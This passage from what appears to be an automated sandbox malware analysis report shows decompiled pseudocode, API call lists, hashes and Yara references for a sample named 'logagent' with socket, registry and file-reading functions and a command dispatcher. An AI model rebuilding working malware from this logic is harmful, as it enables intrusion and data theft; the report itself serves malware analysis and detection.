				 *0x41c270 =  *0x41c270 | 0xffffffff;
				 *((intOrPtr*)( *0x415368())) =  *0x41c264;
				_t24 =  *0x41536c();
				_t47 =  *0x41c260;
				 *_t24 =  *0x41c260;
				 *0x41c268 =  *((intOrPtr*)( *0x415370));
				_t27 = E105468C9( *((intOrPtr*)( *0x415370)));
				if( *0x41b190 == 0) {
					_t27 =  *0x415374();
					_t47 = 0x41412c;
				}
				E10555AA9(_t27);
				L10555AA3();
				_v112 =  *0x41c25c;
				 *0x41537c( &_v100,  &_v116,  &_v104,  *0x41c258,  &_v112, 0x41b0e4, 0x41b0e8);
				_push(0x41b0e0);
				_push(0x41b000);
				L10555AA3();
				_t54 =  *((intOrPtr*)( *0x415380));
				_v120 = _t54;
				if( *_t54 != 0x22) {
					while(1) {
						__eflags =  *_t54 - 0x20;
						if(__eflags <= 0) {
							goto L7;
						}
						_t54 = _t54 + 1;
						_v120 = _t54;
					}
				} else {
					do {
						_t54 = _t54 + 1;
						_v120 = _t54;
						_t42 =  *_t54;
					} while (_t42 != 0 && _t42 != 0x22);
					if( *_t54 == 0x22) {
						L6:
						_t54 = _t54 + 1;
						_v120 = _t54;
					}
				}
				L7:
				_t36 =  *_t54;
				if(_t36 != 0 && _t36 <= 0x20) {
					goto L6;
				}
				_v96.dwFlags = 0;
				GetStartupInfoA( &_v96);
				_t68 = _v96.dwFlags & 0x00000001;
				if((_v96.dwFlags & 0x00000001) == 0) {
					_t38 = 0xa;
				} else {
					_t38 = _v96.wShowWindow & 0x0000ffff;
				}
				_t40 = E1054A627(_t47, _t68, GetModuleHandleA(0), 0, _t54, _t38);
				_v108 = _t40;
				exit(_t40);
				_t41 = _v24;
				_t49 =  *((intOrPtr*)( *_t41));
				_v124 = _t49;
				_push(_t41);
				_push(_t49);
				L10555A9D();
				return _t41;
			}

























                                  0x10555949
                                  0x10555956
                                  0x1055595b
                                  0x10555960
                                  0x10555967
                                  0x1055596e
                                  0x10555981
                                  0x10555983
                                  0x10555989
                                  0x1055598f
                                  0x10555998
                                  0x1055599d
                                  0x105559a8
                                  0x105559af
                                  0x105559b5
                                  0x105559b5
                                  0x105559b6
                                  0x105559c5
                                  0x105559cf
                                  0x105559e8
                                  0x105559ee
                                  0x105559f3
                                  0x105559f8
                                  0x10555a05
                                  0x10555a07
                                  0x10555a0d
                                  0x10555a49
                                  0x10555a49
                                  0x10555a4c
                                  0x00000000
                                  0x00000000
                                  0x10555a4e
                                  0x10555a4f
                                  0x10555a4f
                                  0x10555a0f
                                  0x10555a0f
                                  0x10555a0f
                                  0x10555a10
                                  0x10555a13
                                  0x10555a15
                                  0x10555a20
                                  0x10555a22
                                  0x10555a22
                                  0x10555a23
                                  0x10555a23
                                  0x10555a20
                                  0x10555a26
                                  0x10555a26
                                  0x10555a2a
                                  0x00000000
                                  0x00000000
                                  0x10555a30
                                  0x10555a37
                                  0x10555a3d
                                  0x10555a41
                                  0x10555a56
                                  0x10555a43
                                  0x10555a43
                                  0x10555a43
                                  0x10555a62
                                  0x10555a67
                                  0x10555a6b
                                  0x10555a71
                                  0x10555a76
                                  0x10555a78
                                  0x10555a7b
                                  0x10555a7c
                                  0x10555a7d
                                  0x10555a84

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                  • String ID:
                                  • API String ID: 801014965-0
                                  • Opcode ID: cc7414d8dedd444570a0f7fe2e671c385d734ec20d1b5609852bcbaeda24d750
                                  • Instruction ID: 6279e085c1c710bb80de42cc0caf49608318eda4358571d45753d58833216366
                                  • Opcode Fuzzy Hash: cc7414d8dedd444570a0f7fe2e671c385d734ec20d1b5609852bcbaeda24d750
                                  • Instruction Fuzzy Hash: 3F4188B4C40748EFDB20CFE0DC99ADABFB8FB49755B20422BE851972A0D7B45884CB54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040AD6F Relevance: 16.6, APIs: 11, Instructions: 78COMMON
                                  Download Yara Rule
                                  APIs
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AD79
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6DF55DF0), ref: 0040AD91
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 0040ADA1
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040ADB0
                                    • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                    • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                    • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                    • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040ADDB
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040ADF1
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040AE07
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040AE1D
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040AE33
                                    • Part of subcall function 0040AE6A: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040AE88
                                    • Part of subcall function 0040AE6A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040AEA4
                                    • Part of subcall function 0040AE6A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040AEB4
                                    • Part of subcall function 0040AE6A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040AEC1
                                    • Part of subcall function 0040AE6A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AED3
                                    • Part of subcall function 0040AE6A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AEEB
                                    • Part of subcall function 0040AE6A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AEFD
                                    • Part of subcall function 0040AE6A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AF18
                                    • Part of subcall function 0040AE6A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AF2A
                                    • Part of subcall function 0040AE6A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AF42
                                    • Part of subcall function 0040AE6A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AF4B
                                    • Part of subcall function 0040AE6A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /stext ",?,?,00415628,00000000), ref: 0040AF69
                                    • Part of subcall function 0040AE6A: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040AF7B
                                    • Part of subcall function 0040AE6A: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040AF88
                                    • Part of subcall function 0040AE6A: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040AF95
                                    • Part of subcall function 004020F4: closesocket.WS2_32(0041BE70), ref: 004020F9
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AE56
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AE5F
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$??0?$basic_string@$??1?$basic_string@$V01@@$?c_str@?$basic_string@$D@1@@G@std@@$?length@?$basic_string@G@2@@0@Hstd@@V12@V?$basic_string@$?substr@?$basic_string@$??4?$basic_string@?find@?$basic_string@FileG@1@@G@2@@std@@ModuleNameV01@V10@V10@0@V10@@closesocket
                                  • String ID:
                                  • API String ID: 1795822965-0
                                  • Opcode ID: 577d363030fa7591e52d31dd8c7d90d933b05a2efaa5bb55a7e707ed632d8bb6
                                  • Instruction ID: 48313c0a065dcb0dcea7f82e9129112a0e8bb123b90d7e9a0fd4ac289fd1d0c5
                                  • Opcode Fuzzy Hash: 577d363030fa7591e52d31dd8c7d90d933b05a2efaa5bb55a7e707ed632d8bb6
                                  • Instruction Fuzzy Hash: D3216271A0010DABCB04BBB5DD5A9EE3778EF44341F408569E922A71E1EF745604CB9A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 105451A5 Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 302fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 105439C7: socket.WS2_32(00000000,00000001,00000006), ref: 105439E2
                                  • CreateFileW.KERNEL32(0000FDE8,80000000,00000000,00000000,00000003,00000080,00000000), ref: 105451D4
                                  • GetFileSize.KERNEL32(00000000,?), ref: 1054520A
                                  • ??2@YAPAXI@Z.MSVCRT ref: 105452CF
                                  • SetFilePointer.KERNEL32(?,?,?,?), ref: 105452E3
                                  • ReadFile.KERNEL32(?,?,0000FDE8,?,?), ref: 105452F7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$??2@CreatePointerReadSizesocket
                                  • String ID: [INFO]
                                  • API String ID: 3751854038-4019176272
                                  • Opcode ID: a3579aec32f10f629416afd3da562235689607cd4f213818c8e25dca34f4bb62
                                  • Instruction ID: c785e0b80a8627d9286ff1b3d4790daa99c1430b298d72f01476a4acf643aa22
                                  • Opcode Fuzzy Hash: a3579aec32f10f629416afd3da562235689607cd4f213818c8e25dca34f4bb62
                                  • Instruction Fuzzy Hash: 72C11771C0020DEFDF05EFA0EC99EEEBB79EF44245F108166F416A6160EA716A49CF60
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004124BE Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 58COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 004124CD
                                  • time.MSVCRT ref: 004124E5
                                  • srand.MSVCRT ref: 004124F2
                                  • rand.MSVCRT ref: 00412506
                                  • rand.MSVCRT ref: 0041251A
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@D@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 0041252D
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 0041253D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 00412546
                                  Strings
                                  • abcdefghijklmnopqrstuvwxyz, xrefs: 004124D5
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@rand$??1?$basic_string@D@1@@V01@V01@@Y?$basic_string@srandtime
                                  • String ID: abcdefghijklmnopqrstuvwxyz
                                  • API String ID: 3357298394-1277644989
                                  • Opcode ID: 15b0aad6ad470baee71e932c84e056877b09aa3be15cdb2110e7ae94f5adee03
                                  • Instruction ID: 712daf16f8b1022a6d974ed1f73c2a3049aadf137e9a4f533f5eb28a92ccc556
                                  • Opcode Fuzzy Hash: 15b0aad6ad470baee71e932c84e056877b09aa3be15cdb2110e7ae94f5adee03
                                  • Instruction Fuzzy Hash: F211A57754021DEBCB04EBA1ED49AEE7BB9EB80361F104026FD01E71D0DA759945CB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040B95B Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 50COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,origmsc), ref: 0040B96C
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(004032A4,?), ref: 0040B97C
                                    • Part of subcall function 00412795: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127A4
                                    • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127AE
                                    • Part of subcall function 00412795: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127B7
                                    • Part of subcall function 00412795: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127C1
                                    • Part of subcall function 00412795: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127CB
                                    • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?), ref: 004127E1
                                    • Part of subcall function 00412795: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127EA
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004032A4,80000001), ref: 0040B993
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004032A4), ref: 0040B9AB
                                    • Part of subcall function 0040B9E8: RegOpenKeyExW.ADVAPI32(80000001,0040B9BA,00000000,00000002,0040B9BA,?,0040B9BA,80000001,00000000), ref: 0040B9F9
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9C2
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9CB
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9D4
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9DD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$D@2@@std@@D@std@@$??1?$basic_string@$??0?$basic_string@$?begin@?$basic_string@?c_str@?$basic_string@D@1@@$?end@?$basic_string@?length@?$basic_string@G@1@@OpenV01@@
                                  • String ID: origmsc
                                  • API String ID: 643209241-68016026
                                  • Opcode ID: 494479129972e0f7fefba417d02f2ddae7ca3d57713fac6220985ed7839bb053
                                  • Instruction ID: bc2c983ee8b044bee8b0063c187639ee25001bfa26dad0cec207db0dad549837
                                  • Opcode Fuzzy Hash: 494479129972e0f7fefba417d02f2ddae7ca3d57713fac6220985ed7839bb053
                                  • Instruction Fuzzy Hash: 9111B17280050DEFCF04EFE0ED598DE77B9EA482557104025F912D31A0EB71AA59CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041290A Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 40COMMON
                                  Download Yara Rule
                                  APIs
                                  • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z.MSVCP60(?,00000000,6DF7CB60,?,?,0041225E,?), ref: 00412919
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,?,?,0041225E,?), ref: 00412937
                                  • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,0041225E,?), ref: 0041293F
                                  • ?replace@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@IIPBG@Z.MSVCP60(00000000,00000000,?,?,0041225E,?), ref: 0041294A
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000,?,?,0041225E,?), ref: 00412954
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,0041225E,?), ref: 0041295D
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,0041225E,?), ref: 0041296C
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,0041225E,?), ref: 00412975
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$G@2@@std@@G@std@@U?$char_traits@$??0?$basic_string@$??1?$basic_string@V01@@$?find@?$basic_string@?length@?$basic_string@?replace@?$basic_string@G@1@@V12@
                                  • String ID: ^"A
                                  • API String ID: 1083762089-1057680782
                                  • Opcode ID: 9915cc168a76eb8c27643a4995d50bfb89b5da52f4a242ec9541e0b2919b6f35
                                  • Instruction ID: 92156a76a3fbabd4be7b0d6bbce5c3b04c59df92facb318773be45834bd60316
                                  • Opcode Fuzzy Hash: 9915cc168a76eb8c27643a4995d50bfb89b5da52f4a242ec9541e0b2919b6f35
                                  • Instruction Fuzzy Hash: C201083650051EEFCF049F64EC489ED3BB8FB84355B048564FC16972A0EB70AA55CF44
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00411C4C Relevance: 15.1, APIs: 10, Instructions: 108COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 15%
                                  			E00411C4C(void* __eflags, intOrPtr _a4) {
				char _v20;
				void* _v36;
				char _v52;
				int _t21;
				signed int _t35;
				void* _t39;
				void* _t45;
				void* _t61;
				void* _t62;
				void* _t63;
				void* _t64;
				void* _t65;
				intOrPtr _t67;
				void* _t69;
				void* _t71;
				void* _t72;
				void* _t75;

				_t75 = __eflags;
				_t67 = _a4;
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(_t67 + 0x18);
				_t21 = SetEvent( *(_t67 + 0x28));
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				__imp__?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z();
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				_t71 = _t69;
				_t45 = _t71;
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				E004129EB(_t75,  &_v20,  &_v52, 0x41b310,  &_v52, 4,  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB);
				_t72 = _t71 + 0x24;
				_t61 =  *_t21 - 0x61;
				if(_t61 == 0) {
					_push(E0040180C( &_v20, __eflags, 2));
					_push(E0040180C( &_v20, __eflags, 1));
					_push(E0040180C( &_v20, __eflags, 0));
					_push(_t72 - 0x10);
					E00411D8A(E00412881(_t29));
				} else {
					_t62 = _t61 - 0x3d;
					if(_t62 == 0) {
						E00411A24(_t45);
					} else {
						_t63 = _t62 - 4;
						if(_t63 == 0) {
							_t35 = E0040180C( &_v20, __eflags, 0);
							__imp__??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z(0);
							__eflags =  *_t35;
							E00411B59(E0040180C( &_v20,  *_t35, 1), _t35 & 0xffffff00 | __eflags != 0x00000000);
						} else {
							_t64 = _t63 - 3;
							if(_t64 == 0) {
								_t39 =  *0x41c1d4;
								__eflags = _t39;
								if(_t39 != 0) {
									SetEvent(_t39);
								}
							} else {
								_t65 = _t64 - 1;
								if(_t65 == 0) {
									 *0x41c1d2 = 1;
								} else {
									if(_t65 == 1) {
										 *0x41c1d3 = 1;
									}
								}
							}
						}
					}
				}
				E004017DD( &_v20);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return 0;
			}




















                                  0x00411c4c
                                  0x00411c53
                                  0x00411c5e
                                  0x00411c6d
                                  0x00411c72
                                  0x00411c8a
                                  0x00411c9a
                                  0x00411ca0
                                  0x00411ca6
                                  0x00411ca9
                                  0x00411cb3
                                  0x00411cb8
                                  0x00411cbb
                                  0x00411cbe
                                  0x00411d3c
                                  0x00411d47
                                  0x00411d57
                                  0x00411d58
                                  0x00411d60
                                  0x00411cc0
                                  0x00411cc0
                                  0x00411cc3
                                  0x00411d2b
                                  0x00411cc5
                                  0x00411cc5
                                  0x00411cc8
                                  0x00411d03
                                  0x00411d0a
                                  0x00411d10
                                  0x00411d22
                                  0x00411cca
                                  0x00411cca
                                  0x00411ccd
                                  0x00411cee
                                  0x00411cf3
                                  0x00411cf5
                                  0x00411cf8
                                  0x00411cf8
                                  0x00411ccf
                                  0x00411ccf
                                  0x00411cd0
                                  0x00411ce5
                                  0x00411cd2
                                  0x00411cd3
                                  0x00411cd9
                                  0x00411cd9
                                  0x00411cd3
                                  0x00411cd0
                                  0x00411ccd
                                  0x00411cc8
                                  0x00411cc3
                                  0x00411d6b
                                  0x00411d73
                                  0x00411d7c
                                  0x00411d87

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00411C5E
                                  • SetEvent.KERNEL32(?), ref: 00411C6D
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00411C72
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6DF55DF0), ref: 00411C8A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 00411C9A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00411CA9
                                    • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                    • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
